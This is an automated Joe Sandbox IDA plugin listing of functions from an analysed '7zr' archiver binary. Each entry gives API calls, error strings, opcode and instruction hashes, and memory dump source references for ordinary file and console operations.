                                              • API String ID: 3316598575-2587938151
                                              • Opcode ID: 2e5688116134fda9c0732df812e05706802453462e9dc37e215a0326dd7b1e21
                                              • Instruction ID: 0b2c63d5b421e6d9c399d2a56fccf43edfc75626ba37694e4ac42970a5abed2f
                                              • Opcode Fuzzy Hash: 2e5688116134fda9c0732df812e05706802453462e9dc37e215a0326dd7b1e21
                                              • Instruction Fuzzy Hash: C4E1253090020DDACFA5EFA4C895BFEB7B1EF14314F108219EA66672D1DB716A49DB13
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D06FCA
                                                • Part of subcall function 00D06E71: __EH_prolog.LIBCMT ref: 00D06E76
                                              Strings
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                              • API String ID: 3519838083-394804653
                                              • Opcode ID: 687c72fbbe4478893bae5a9a09b6454f29700d5810e96fd20a5e3157fe659533
                                              • Instruction ID: 43c4722b6a4e418ba34e65fd7155b3eb8a982309e33948b67459e7dd3afe3ca4
                                              • Opcode Fuzzy Hash: 687c72fbbe4478893bae5a9a09b6454f29700d5810e96fd20a5e3157fe659533
                                              • Instruction Fuzzy Hash: 5041A272D092449BCF21DFA4C490BEEBBB5AF49340F58456EE08AA7281C631BE45C772
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: fputs$H_prolog
                                              • String ID: =
                                              • API String ID: 2614055831-2525689732
                                              • Opcode ID: aeec65fe7ee49389c5da23e8902878224d579383ae4e9cf071c92b5a1f95d980
                                              • Instruction ID: c6cb39819b78b3257b8b364a29e6e2d758fbbc9d4547831e46445b1199f05771
                                              • Opcode Fuzzy Hash: aeec65fe7ee49389c5da23e8902878224d579383ae4e9cf071c92b5a1f95d980
                                              • Instruction Fuzzy Hash: D8218C32905118EBCF09EB94E952BEDBBB5EF58314F24002AE901B2191DF716E44EBA1
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D28346
                                              • fputs.MSVCRT ref: 00D2835B
                                              • fputs.MSVCRT ref: 00D28364
                                                • Part of subcall function 00D283BF: __EH_prolog.LIBCMT ref: 00D283C4
                                                • Part of subcall function 00D283BF: fputs.MSVCRT ref: 00D28401
                                                • Part of subcall function 00D283BF: fputs.MSVCRT ref: 00D28437
                                              Strings
                                              Similarity
                                              • API ID: fputs$H_prolog
                                              • String ID: =
                                              • API String ID: 2614055831-2525689732
                                              • Opcode ID: b42c943b8629621172c4a230f1e1321819de85ed4655c07efb40f5038c5e7704
                                              • Instruction ID: 24784ea6f2506c48e5a2cfeee6956bb03fda3fed03e140a2448e3a899f1d588a
                                              • Opcode Fuzzy Hash: b42c943b8629621172c4a230f1e1321819de85ed4655c07efb40f5038c5e7704
                                              • Instruction Fuzzy Hash: E901D631A00018EBCF05FBA4D812AFDBB75EF84714F00401AF901922A1CF754A55EBF2
                                              APIs
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,00D0AB57), ref: 00D87DAA
                                              • GetLastError.KERNEL32(?,00000000,00D0AB57), ref: 00D87DBB
                                              • CloseHandle.KERNELBASE(00000000,?,00000000,00D0AB57), ref: 00D87DCF
                                              • GetLastError.KERNEL32(?,00000000,00D0AB57), ref: 00D87DD9
                                              Similarity
                                              • API ID: ErrorLast$CloseHandleObjectSingleWait
                                              • String ID:
                                              • API String ID: 1796208289-0
                                              • Opcode ID: 63a9db08ec86abf4bb733393fa0496c967f046f6d1b0d313dbaf9341a9e3134e
                                              • Instruction ID: 911d4ea2913f39d8a304ded1a69badc2380da2b5fe3f40b93e5713201fa5345b
                                              • Opcode Fuzzy Hash: 63a9db08ec86abf4bb733393fa0496c967f046f6d1b0d313dbaf9341a9e3134e
                                              • Instruction Fuzzy Hash: C3F0FE72308202D7EB207ABD9C84B367698AF523B4F380726E565D32E0EA64DC408730
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1209B
                                                • Part of subcall function 00CF757D: GetLastError.KERNEL32(00CFD14C), ref: 00CF757D
                                                • Part of subcall function 00D12C6C: __EH_prolog.LIBCMT ref: 00D12C71
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Similarity
                                              • API ID: H_prolog$ErrorLastfree
                                              • String ID: Cannot find archive file$The item is a directory
                                              • API String ID: 683690243-1569138187
                                              • Opcode ID: a1f44c32a8b138fa1bc3f8b47b2ea25f816d9294e6926dafcfdae328c8f14455
                                              • Instruction ID: f2aa721f9fff36b64defc4b65c8a3b539b2fb44c5a43d0b4156403ec372b6b5b
                                              • Opcode Fuzzy Hash: a1f44c32a8b138fa1bc3f8b47b2ea25f816d9294e6926dafcfdae328c8f14455
                                              • Instruction Fuzzy Hash: 15725A74D00258EFCB25DF68D884BEDBBB1BF49300F184099E959A7252CB719E91CF61
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CountTickfputs
                                              • String ID: .
                                              • API String ID: 290905099-4150638102
                                              • Opcode ID: 7d9600619c9ec1f144b26da18c68c4a5b1006a7f13ebfdac8a79dd63737fa659
                                              • Instruction ID: 3a847a76b5c3378966010215f00f4cadfa9e624ee1d1f4ada7d3d4b1a0a68c47
                                              • Opcode Fuzzy Hash: 7d9600619c9ec1f144b26da18c68c4a5b1006a7f13ebfdac8a79dd63737fa659
                                              • Instruction Fuzzy Hash: B3718A31610B189FCB61EF68D481AAEB7F6BF91308F14581DE58787681DB70BC49CB22
                                              APIs
                                                • Part of subcall function 00CF9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00CF9CB3
                                                • Part of subcall function 00CF9C8F: GetProcAddress.KERNEL32(00000000), ref: 00CF9CBA
                                                • Part of subcall function 00CF9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00CF9CC8
                                              • __aulldiv.LIBCMT ref: 00D3093F
                                              • __aulldiv.LIBCMT ref: 00D3094B
                                              Strings
                                              Similarity
                                              • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                              • String ID: 3333
                                              • API String ID: 3520896023-2924271548
                                              • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                              • Instruction ID: 3861a832bcafe3ba538ca1fbfbbffebee1eb6749ad7fe58570993bd48897af3c
                                              • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                              • Instruction Fuzzy Hash: 4B21A9B19007046FE730EF6A8881B5FFAFDFB88750F04892EB186D3642D670A9408B75
                                              APIs
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              • memset.MSVCRT ref: 00D1AEBA
                                              • memset.MSVCRT ref: 00D1AECD
                                                • Part of subcall function 00D304D2: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00D304F8
                                              Strings
                                              Similarity
                                              • API ID: memset$ExceptionThrowfree
                                              • String ID: Split
                                              • API String ID: 1404239998-1882502421
                                              • Opcode ID: d230823d2a567da97e6faee875237c09e0a999860d67595a19d4016e93e30e29
                                              • Instruction ID: 031cabdce243a42d689ac2e97e563832d139e4605a7d990c12a8ff28d2f91f9c
                                              • Opcode Fuzzy Hash: d230823d2a567da97e6faee875237c09e0a999860d67595a19d4016e93e30e29
                                              • Instruction Fuzzy Hash: D7427F74A05248EFDF25DBA8D984BEDB7B2BF05304F184099E449A7251CB31ADC5CF62
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF759F
                                                • Part of subcall function 00CF764C: CloseHandle.KERNELBASE(00000000,?,00CF75AF,00000002,?,00000000,00000000), ref: 00CF7657
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 00CF75E5
                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00CF7626
                                              Similarity
                                              • API ID: CreateFile$CloseH_prologHandle
                                              • String ID:
                                              • API String ID: 449569272-0
                                              • Opcode ID: 1a0b344173804faf5411e42cef30d38cbfbc962498b5fc0b1fcad3a6b3ef2713
                                              • Instruction ID: b97edc4e73ba87ccd8806f338539c669502bc50102c9fc095c9916511830b201
                                              • Opcode Fuzzy Hash: 1a0b344173804faf5411e42cef30d38cbfbc962498b5fc0b1fcad3a6b3ef2713
                                              • Instruction Fuzzy Hash: 1D11877140020EEFCF519FA4DC418FEBB7AFF14354B108629FA60561A1C7319E65EB51
                                              APIs
                                              • fputs.MSVCRT ref: 00D28437
                                              • fputs.MSVCRT ref: 00D28401
                                                • Part of subcall function 00CF1FB3: __EH_prolog.LIBCMT ref: 00CF1FB8
                                              • __EH_prolog.LIBCMT ref: 00D283C4
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                              Similarity
                                              • API ID: H_prologfputs$fputc
                                              • String ID:
                                              • API String ID: 678540050-0
                                              • Opcode ID: dafe19cec3f5734aa4b91b866ce541dd7da22bd34b49b77132630b8099787bb2
                                              • Instruction ID: 07cf81254583cb3d59519f461b66f8156e781cd279ba99a80a491c72c48c9ede
                                              • Opcode Fuzzy Hash: dafe19cec3f5734aa4b91b866ce541dd7da22bd34b49b77132630b8099787bb2
                                              • Instruction Fuzzy Hash: 3911A931B0411DDBCF09BBE4D8139BEBBB6DF40750F100029F60193291DF665945A6F6
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,00CF77DB,?,?,00000000,?,00CF7832,?), ref: 00CF7773
                                              • GetLastError.KERNEL32(?,00CF77DB,?,?,00000000,?,00CF7832,?,?,?,?,00000000), ref: 00CF7780
                                              • SetLastError.KERNEL32(00000000,?,?,00CF77DB,?,?,00000000,?,00CF7832,?,?,?,?,00000000), ref: 00CF7797
                                              Similarity
                                              • API ID: ErrorLast$FilePointer
                                              • String ID:
                                              • API String ID: 1156039329-0
                                              • Opcode ID: ba0be7f34f473e68d6ed3bfe73638efff67d3f0b8980fd40a93ac4b9b4b81321
                                              • Instruction ID: 222e4e9273cfc7676e1cd42beb1fefecef814ae299905f67510a56d1ffdaa096
                                              • Opcode Fuzzy Hash: ba0be7f34f473e68d6ed3bfe73638efff67d3f0b8980fd40a93ac4b9b4b81321
                                              • Instruction Fuzzy Hash: C3110131610309AFEF16DF68DC45BAE37E5AF04320F10852AFA26D72A1D7B09E10DB61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF5A91
                                              • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00CF5AB7
                                              • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00CF5AEC
                                              Similarity
                                              • API ID: AttributesFile$H_prolog
                                              • String ID:
                                              • API String ID: 3790360811-0
                                              • Opcode ID: d8f235c869eac361efe40d53dc3eb88abd639fd10f051d69cedaad53cc6261ad
                                              • Instruction ID: 687e81489ca61300a17472b728e9cee9ec129bf430816433021b49edc0cdbc24
                                              • Opcode Fuzzy Hash: d8f235c869eac361efe40d53dc3eb88abd639fd10f051d69cedaad53cc6261ad
                                              • Instruction Fuzzy Hash: 6A01B532D0021DABCF55AFA59C816BEB775EF40350F144426EF21A3252CB368D15E662
                                              APIs
                                              • EnterCriticalSection.KERNEL32(00DB2938), ref: 00D2588B
                                              • LeaveCriticalSection.KERNEL32(00DB2938), ref: 00D258BC
                                                • Part of subcall function 00D2C911: GetTickCount.KERNEL32 ref: 00D2C926
                                              Strings
                                              Similarity
                                              • API ID: CriticalSection$CountEnterLeaveTick
                                              • String ID: v
                                              • API String ID: 1056156058-3261393531
                                              • Opcode ID: 766129c15d866ddf2e94303b0f4080a5788386ad3c7e72a1f2393df878fd9a6d
                                              • Instruction ID: c483fd3631e4b29e603dc569735ed0d532143a6de9ff222b036d89b4f37cba7b
                                              • Opcode Fuzzy Hash: 766129c15d866ddf2e94303b0f4080a5788386ad3c7e72a1f2393df878fd9a6d
                                              • Instruction Fuzzy Hash: DDE0C276615220DFC704DB18E909E9A77A5AFA8311F05156AE409C7362CB709D49CAB1
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D05BEF
                                                • Part of subcall function 00D054C0: __EH_prolog.LIBCMT ref: 00D054C5
                                                • Part of subcall function 00D05630: __EH_prolog.LIBCMT ref: 00D05635
                                                • Part of subcall function 00D136EA: __EH_prolog.LIBCMT ref: 00D136EF
                                                • Part of subcall function 00D057C1: __EH_prolog.LIBCMT ref: 00D057C6
                                                • Part of subcall function 00D058BE: __EH_prolog.LIBCMT ref: 00D058C3
                                              Strings
                                              • Cannot seek to begin of file, xrefs: 00D0610F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Cannot seek to begin of file
                                              • API String ID: 3519838083-2298593816
                                              • Opcode ID: 57227eddf615c4db4a806d5393b3c69155736b2ee4616a594a9ea78263549e46
                                              • Instruction ID: f9e64f2712ef4e4cda241a8c5fd5bf4a4bc914329e4bedf7eda0caf0a534b341
                                              • Opcode Fuzzy Hash: 57227eddf615c4db4a806d5393b3c69155736b2ee4616a594a9ea78263549e46
                                              • Instruction Fuzzy Hash: 3112E1319047499FDF25DFA4C884BEEBBB5AF04314F18405DE98A572D2DB70AA44CB72
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D34E8F
                                                • Part of subcall function 00CF965D: VariantClear.OLEAUT32(?), ref: 00CF967F
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ClearH_prologVariantfree
                                              • String ID: file
                                              • API String ID: 904627215-2359244304
                                              • Opcode ID: bd04c83c18944a0c0da0acf30504ed9564113a0180e4a640f42f9a71b3036d13
                                              • Instruction ID: 6066caef03446ac5f092396cd116ace52e1ab550926f2fa8dfcb03cd7e308d86
                                              • Opcode Fuzzy Hash: bd04c83c18944a0c0da0acf30504ed9564113a0180e4a640f42f9a71b3036d13
                                              • Instruction Fuzzy Hash: F112933490020DDFCF15EFA5C985AEDBBB6FF44344F284068E905AB252DB32AE45DB61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D12CE0
                                                • Part of subcall function 00CF5E10: __EH_prolog.LIBCMT ref: 00CF5E15
                                                • Part of subcall function 00D041EC: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00D0421A
                                                • Part of subcall function 00CF965D: VariantClear.OLEAUT32(?), ref: 00CF967F
                                              Strings
                                              • Cannot create output directory, xrefs: 00D13070
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ClearExceptionThrowVariant
                                              • String ID: Cannot create output directory
                                              • API String ID: 814188403-1181934277
                                              • Opcode ID: 991c1be91a02916907652c34d6a0900a4196474f186cb03f9092a4b5f646503d
                                              • Instruction ID: c4adf070df5e5210871794ab7f117e586f48f8767d9153f3b4519569c724f11a
                                              • Opcode Fuzzy Hash: 991c1be91a02916907652c34d6a0900a4196474f186cb03f9092a4b5f646503d
                                              • Instruction Fuzzy Hash: 8FF1A030901289EFCF25EFA4D890AFDBBB5BF18300F1840A9E54567252DB31AE95DB71
                                              APIs
                                              • fputs.MSVCRT ref: 00D2C840
                                                • Part of subcall function 00CF25CB: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00CF25ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowfputs
                                              • String ID:
                                              • API String ID: 1334390793-399585960
                                              • Opcode ID: 6b8fac48b43ed97ef0c9128b85f58bac5f0090f12213dfedb2488f7200e2ced1
                                              • Instruction ID: b4a49439f4680c324b441ae5e2482dfce69a1bfceb9d5e8a9b06e80692ccb807
                                              • Opcode Fuzzy Hash: 6b8fac48b43ed97ef0c9128b85f58bac5f0090f12213dfedb2488f7200e2ced1
                                              • Instruction Fuzzy Hash: AF11B2716147449FDB25CF58D8D1BAAFBE6EF59304F08846EE1468B251C7B1BC04C761
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: Open
                                              • API String ID: 1795875747-71445658
                                              • Opcode ID: c31a26c68dbf701c55943e26c2f6cb9a8b4e95e1e7242392f32b7d8ba9dcc58e
                                              • Instruction ID: f76329b092fa81e9a2a7f5fea3db49ed63f1fd979827e062fe630e5a659ee5d9
                                              • Opcode Fuzzy Hash: c31a26c68dbf701c55943e26c2f6cb9a8b4e95e1e7242392f32b7d8ba9dcc58e
                                              • Instruction Fuzzy Hash: 0E11CA320007049FC760EF74E991AEABBE1EF20314B14882FE19AC3212DA31B804CF64
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D058C3
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: 878ec440a46161e35f741ba60fc58f8aa534f81693b119ba451477322412bab6
                                              • Instruction ID: b4069ba3a149ab694d1c9bd25af056febd8e0d136029fa1ea5233e3ed8ad4183
                                              • Opcode Fuzzy Hash: 878ec440a46161e35f741ba60fc58f8aa534f81693b119ba451477322412bab6
                                              • Instruction Fuzzy Hash: F991C331900509DBCF21DBA4E881BFFBBB6AF44340F184069EA4AA7295DB31AD44DF71
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D406B3
                                              • _CxxThrowException.MSVCRT(?,00DAD480), ref: 00D408F2
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$H_prologmalloc
                                              • String ID:
                                              • API String ID: 3044594480-0
                                              • Opcode ID: dbd8444cfaf1e7339d76be1d528ad4b8f3803a4ba62fdb56aefd355844e1c34a
                                              • Instruction ID: b3f756864358082a4faa582cb21fc05fc63efa4f65addffd73ef1a25a422340e
                                              • Opcode Fuzzy Hash: dbd8444cfaf1e7339d76be1d528ad4b8f3803a4ba62fdb56aefd355844e1c34a
                                              • Instruction Fuzzy Hash: AB912A75900249DFCB21EFA8C985AEEBBB5EF09304F184199E945A7252C730AE44DFB1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e6b59e8d419106e319c2b98355a25bd5d6f2c7b8fa39c1477b3445c5772d6871
                                              • Instruction ID: 9fcd28e122488db46759c0d136f1de47035f8e4ce53c007d3ab17bc151148ccf
                                              • Opcode Fuzzy Hash: e6b59e8d419106e319c2b98355a25bd5d6f2c7b8fa39c1477b3445c5772d6871
                                              • Instruction Fuzzy Hash: 22516E71908B80AFDB25DB74C490BEABBF5BF45300F18895DE4DA4B282D730B984DB61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D17B4D
                                              • memcpy.MSVCRT(00000000,00DB27DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 00D17C65
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologmemcpy
                                              • String ID:
                                              • API String ID: 2991061955-0
                                              • Opcode ID: 56354255f8703c1dbf712737a46f2f717db9842f2f60a523a80f84265cca8338
                                              • Instruction ID: e056fbd359659fccc55723323178862c1c57f7f6b902d66e3faf8791d8bceebc
                                              • Opcode Fuzzy Hash: 56354255f8703c1dbf712737a46f2f717db9842f2f60a523a80f84265cca8338
                                              • Instruction Fuzzy Hash: 19417C71904218EBCF20EFA4D951AEEB7F5FF04300F144529E446A72A2DB31AE89DB71
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D41516
                                                • Part of subcall function 00D410D3: __EH_prolog.LIBCMT ref: 00D410D8
                                              • _CxxThrowException.MSVCRT(?,00DAD480), ref: 00D41561
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrow
                                              • String ID:
                                              • API String ID: 2366012087-0
                                              • Opcode ID: d816031a189ab73050e7c3ab486e96379c31046dbfd492c7a218330998e80c20
                                              • Instruction ID: 8552f260363e95333a1dafba3c77c0bb0bdafcbf1fbb4894cff4c75d6f8750c7
                                              • Opcode Fuzzy Hash: d816031a189ab73050e7c3ab486e96379c31046dbfd492c7a218330998e80c20
                                              • Instruction Fuzzy Hash: 4701AD36500288AFDF129F94C815BEE7FB8EF85354F04405AF4455B212C3B6E9A59BB1
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D25800
                                              • fputs.MSVCRT ref: 00D25830
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologfputcfputsfree
                                              • String ID:
                                              • API String ID: 195749403-0
                                              • Opcode ID: 0de27d340731495f66f8650c193c0d2e46bfc2d0b9f59fe2c09ea1563396c20a
                                              • Instruction ID: b02972c42e890857b9310e883e1fd0524af72a66d06b2e6c5b508f98211b9940
                                              • Opcode Fuzzy Hash: 0de27d340731495f66f8650c193c0d2e46bfc2d0b9f59fe2c09ea1563396c20a
                                              • Instruction Fuzzy Hash: 2CF08232914518DFCB19FF94E406BEEBBB1FF04350F00442AF501A3191CB756995DBA9
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$fputc
                                              • String ID:
                                              • API String ID: 1185151155-0
